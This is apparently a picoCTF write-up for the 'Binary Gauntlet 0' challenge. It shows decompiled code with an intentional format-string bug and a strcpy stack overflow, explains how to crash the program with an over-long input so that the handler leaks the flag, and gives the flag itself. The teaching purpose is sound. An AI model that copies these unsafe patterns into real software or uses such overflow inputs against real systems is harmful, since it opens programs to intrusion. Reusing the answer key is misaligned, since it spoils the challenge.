Comment on page
Binary Gauntlet 0
This series of problems has to do with binary protections and how they affect exploiting a very simple program. How far can you make it in the gauntlet? gauntlet nc mercury.picoctf.net 37752
- 1.Decompile the binary using Ghidra.
main
function:undefined8 main(void){char local_88 [108];__gid_t local_1c;FILE *local_18;char *local_10;local_10 = (char *)malloc(1000);local_18 = fopen("flag.txt","r");if (local_18 == (FILE *)0x0) {puts("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are runningthis on the shell server.");/* WARNING: Subroutine does not return */exit(0);}fgets(flag,0x40,local_18);signal(0xb,sigsegv_handler);local_1c = getegid();setresgid(local_1c,local_1c,local_1c);fgets(local_10,1000,stdin);local_10[999] = '\0';printf(local_10);fflush(stdout);fgets(local_10,1000,stdin);local_10[999] = '\0';strcpy(local_88,local_10);return 0;}sigsegv_handler
function:void sigsegv_handler(void){fprintf(stderr,"%s\n",flag);fflush(stderr);/* WARNING: Subroutine does not return */exit(1);} - 2.As you can see, if the program crashes the flag will be printed. We can cause a crash by overflowing the the
local_88
whenlocal_10
is copied into in thestrcpy
function. We controllocal_10
- 3.So send one
a
for the firstfgets
and then send more than 108a
s for the secondfgets
so those 108+a
s get copied into a variable with a size of 108 and thus overflow and cause a crash.
9595dc79e46ae416c5383d858afbb624
Last modified 1yr ago